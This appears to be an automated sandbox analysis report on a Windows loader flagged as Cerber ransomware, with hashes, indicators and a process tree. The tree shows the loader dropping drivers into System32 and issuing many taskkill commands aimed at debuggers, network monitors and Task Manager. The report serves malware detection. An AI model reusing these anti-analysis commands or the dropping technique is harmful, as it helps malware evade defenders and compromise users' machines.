cerber | 3b3b6bc308e28e71b72cd2d206243ea6d853506c972a95638299c1ff30581015

Analysis

max time kernel
32s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Perm Loader.exe
Size

1.7MB
MD5

3292a5cefd93bed0c7696e2f08a31be8
SHA1

d9947b9bee3ce3bc9f4317682190d93ab9c691b1
SHA256

3b3b6bc308e28e71b72cd2d206243ea6d853506c972a95638299c1ff30581015
SHA512

2f940b48fff8f9010f8e9e4944093de085fd62a82cc2fc0caa34441cc2f6d5bf66672e6cdbcb63c286bdc008d2300e50dc4b47b194a174525ddd8ca732a49f0b
SSDEEP

24576:E7vwe+8ljws5G8Nc9sOgSNMMFJAyAL+3Xw2PP6MReN/IAUqNOmNAFwa/k:EgqdG8Nc9sOxtJVw2nzA3s/

Score

10^/10

cerber ransomware

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
		2644	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1056	taskkill.exe
		3832	taskkill.exe
		1160	taskkill.exe
		2808	taskkill.exe
		1588	taskkill.exe
		2076	taskkill.exe
		2176	taskkill.exe
		2424	taskkill.exe
		4696	taskkill.exe
		2820	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		3580	taskkill.exe
		1740	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4080	taskkill.exe
		2608	taskkill.exe
		1672	taskkill.exe
		4616	taskkill.exe
		4956	taskkill.exe
		4388	taskkill.exe
		4364	taskkill.exe
		1100	taskkill.exe
		3760	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		3636	taskkill.exe
		1324	taskkill.exe
		4596	taskkill.exe
		2348	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1508	taskkill.exe
		716	taskkill.exe
		1772	taskkill.exe
		3684	taskkill.exe
		4984	taskkill.exe
		1260	taskkill.exe
		1796	taskkill.exe
		3832	taskkill.exe
		264	taskkill.exe
		232	taskkill.exe
		4548	taskkill.exe
		1816	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2476	taskkill.exe
		2796	taskkill.exe
		3476	taskkill.exe
		4740	taskkill.exe
		3704	taskkill.exe
		2524	taskkill.exe
		2808	taskkill.exe
		3604	taskkill.exe
		372	taskkill.exe
		4004	taskkill.exe
		2224	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2284	taskkill.exe
		184	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2592	taskkill.exe
		5064	taskkill.exe
		5016	taskkill.exe

Cerber family
cerber

Executes dropped EXE 24 IoCs

pid	Process
4416	AMIDEWINx64.EXE
2568	AMIDEWINx64.EXE
1708	AMIDEWINx64.EXE
1976	AMIDEWINx64.EXE
3216	AMIDEWINx64.EXE
1100	AMIDEWINx64.EXE
932	AMIDEWINx64.EXE
1664	AMIDEWINx64.EXE
4404	AMIDEWINx64.EXE
1564	AMIDEWINx64.EXE
4124	AMIDEWINx64.EXE
1064	AMIDEWINx64.EXE
3652	AMIDEWINx64.EXE
116	AMIDEWINx64.EXE
1644	AMIDEWINx64.EXE
4064	AMIDEWINx64.EXE
4076	AMIDEWINx64.EXE
4524	AMIDEWINx64.EXE
1672	AMIDEWINx64.EXE
1128	AMIDEWINx64.EXE
4456	AMIDEWINx64.EXE
4956	AMIDEWINx64.EXE
2368	AFUWINx64.EXE
1224	AFUWINx64.EXE

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\amifldrv64.sys	Perm Loader.exe
File created	C:\Windows\System32\AMIDEWINx64.EXE	Perm Loader.exe
File created	C:\Windows\System32\amigendrv64.sys	Perm Loader.exe
File created	C:\Windows\System32\AFUWINx64.EXE	Perm Loader.exe
File created	C:\Windows\System32\Tasks\Mac.bat	curl.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1816	taskkill.exe
4000	taskkill.exe
1260	taskkill.exe
3492	taskkill.exe
2224	taskkill.exe
1424	taskkill.exe
3680	taskkill.exe
1580	taskkill.exe
1244	taskkill.exe
1508	taskkill.exe
3780	taskkill.exe
1060	taskkill.exe
2592	taskkill.exe
4740	taskkill.exe
4560	taskkill.exe
4228	taskkill.exe
3684	taskkill.exe
4956	taskkill.exe
4416	taskkill.exe
928	taskkill.exe
3136	taskkill.exe
1856	taskkill.exe
3416	taskkill.exe
2348	taskkill.exe
3832	taskkill.exe
232	taskkill.exe
3032	taskkill.exe
2476	taskkill.exe
2072	taskkill.exe
4604	taskkill.exe
2152	taskkill.exe
4792	taskkill.exe
4076	taskkill.exe
1532	taskkill.exe
3404	taskkill.exe
3020	taskkill.exe
2808	taskkill.exe
1740	taskkill.exe
2024	taskkill.exe
3760	taskkill.exe
4088	taskkill.exe
2120	taskkill.exe
1100	taskkill.exe
2224	taskkill.exe
4588	taskkill.exe
2424	taskkill.exe
216	taskkill.exe
4976	taskkill.exe
3784	taskkill.exe
1500	taskkill.exe
1224	taskkill.exe
3616	taskkill.exe
1684	taskkill.exe
5040	taskkill.exe
992	taskkill.exe
4364	taskkill.exe
3300	taskkill.exe
3508	taskkill.exe
4392	taskkill.exe
4968	taskkill.exe
664	taskkill.exe
1580	taskkill.exe
184	taskkill.exe
1288	taskkill.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe
3496	Perm Loader.exe

Suspicious behavior: LoadsDriver 24 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	4596	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	3636	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	264	taskkill.exe
Token: SeDebugPrivilege	184	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	4364	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	5016	taskkill.exe
Token: SeDebugPrivilege	4616	taskkill.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	4292	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	232	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	3704	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	4416	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	4928	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	3596	taskkill.exe
Token: SeDebugPrivilege	3240	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	4984	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3496 wrote to memory of 4532	3496	Perm Loader.exe	83
PID 3496 wrote to memory of 4532	3496	Perm Loader.exe	83
PID 4532 wrote to memory of 1772	4532	cmd.exe	84
PID 4532 wrote to memory of 1772	4532	cmd.exe	84
PID 3496 wrote to memory of 1492	3496	Perm Loader.exe	86
PID 3496 wrote to memory of 1492	3496	Perm Loader.exe	86
PID 1492 wrote to memory of 2808	1492	cmd.exe	87
PID 1492 wrote to memory of 2808	1492	cmd.exe	87
PID 3496 wrote to memory of 2080	3496	Perm Loader.exe	88
PID 3496 wrote to memory of 2080	3496	Perm Loader.exe	88
PID 2080 wrote to memory of 4596	2080	cmd.exe	89
PID 2080 wrote to memory of 4596	2080	cmd.exe	89
PID 3496 wrote to memory of 2184	3496	Perm Loader.exe	90
PID 3496 wrote to memory of 2184	3496	Perm Loader.exe	90
PID 2184 wrote to memory of 4604	2184	cmd.exe	91
PID 2184 wrote to memory of 4604	2184	cmd.exe	91
PID 3496 wrote to memory of 928	3496	Perm Loader.exe	92
PID 3496 wrote to memory of 928	3496	Perm Loader.exe	92
PID 928 wrote to memory of 3636	928	cmd.exe	93
PID 928 wrote to memory of 3636	928	cmd.exe	93
PID 3496 wrote to memory of 992	3496	Perm Loader.exe	94
PID 3496 wrote to memory of 992	3496	Perm Loader.exe	94
PID 992 wrote to memory of 2348	992	cmd.exe	95
PID 992 wrote to memory of 2348	992	cmd.exe	95
PID 3496 wrote to memory of 2028	3496	Perm Loader.exe	96
PID 3496 wrote to memory of 2028	3496	Perm Loader.exe	96
PID 3496 wrote to memory of 1644	3496	Perm Loader.exe	97
PID 3496 wrote to memory of 1644	3496	Perm Loader.exe	97
PID 1644 wrote to memory of 4004	1644	cmd.exe	98
PID 1644 wrote to memory of 4004	1644	cmd.exe	98
PID 3496 wrote to memory of 100	3496	Perm Loader.exe	99
PID 3496 wrote to memory of 100	3496	Perm Loader.exe	99
PID 100 wrote to memory of 2020	100	cmd.exe	100
PID 100 wrote to memory of 2020	100	cmd.exe	100
PID 3496 wrote to memory of 4332	3496	Perm Loader.exe	101
PID 3496 wrote to memory of 4332	3496	Perm Loader.exe	101
PID 4332 wrote to memory of 264	4332	cmd.exe	102
PID 4332 wrote to memory of 264	4332	cmd.exe	102
PID 3496 wrote to memory of 3404	3496	Perm Loader.exe	103
PID 3496 wrote to memory of 3404	3496	Perm Loader.exe	103
PID 3404 wrote to memory of 184	3404	cmd.exe	104
PID 3404 wrote to memory of 184	3404	cmd.exe	104
PID 3496 wrote to memory of 4108	3496	Perm Loader.exe	105
PID 3496 wrote to memory of 4108	3496	Perm Loader.exe	105
PID 4108 wrote to memory of 1588	4108	cmd.exe	106
PID 4108 wrote to memory of 1588	4108	cmd.exe	106
PID 3496 wrote to memory of 2476	3496	Perm Loader.exe	107
PID 3496 wrote to memory of 2476	3496	Perm Loader.exe	107
PID 2476 wrote to memory of 2608	2476	cmd.exe	108
PID 2476 wrote to memory of 2608	2476	cmd.exe	108
PID 3496 wrote to memory of 2388	3496	Perm Loader.exe	109
PID 3496 wrote to memory of 2388	3496	Perm Loader.exe	109
PID 2388 wrote to memory of 1508	2388	cmd.exe	110
PID 2388 wrote to memory of 1508	2388	cmd.exe	110
PID 3496 wrote to memory of 1528	3496	Perm Loader.exe	111
PID 3496 wrote to memory of 1528	3496	Perm Loader.exe	111
PID 1528 wrote to memory of 4364	1528	cmd.exe	112
PID 1528 wrote to memory of 4364	1528	cmd.exe	112
PID 3496 wrote to memory of 2644	3496	Perm Loader.exe	113
PID 3496 wrote to memory of 2644	3496	Perm Loader.exe	113
PID 2644 wrote to memory of 1248	2644	cmd.exe	114
PID 2644 wrote to memory of 1248	2644	cmd.exe	114
PID 3496 wrote to memory of 1488	3496	Perm Loader.exe	115
PID 3496 wrote to memory of 1488	3496	Perm Loader.exe	115

C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:564
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:3600
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Cerber
    PID:3476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3564
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4188
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:4608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1732
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4288
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1812
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1432
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:4012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4256
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
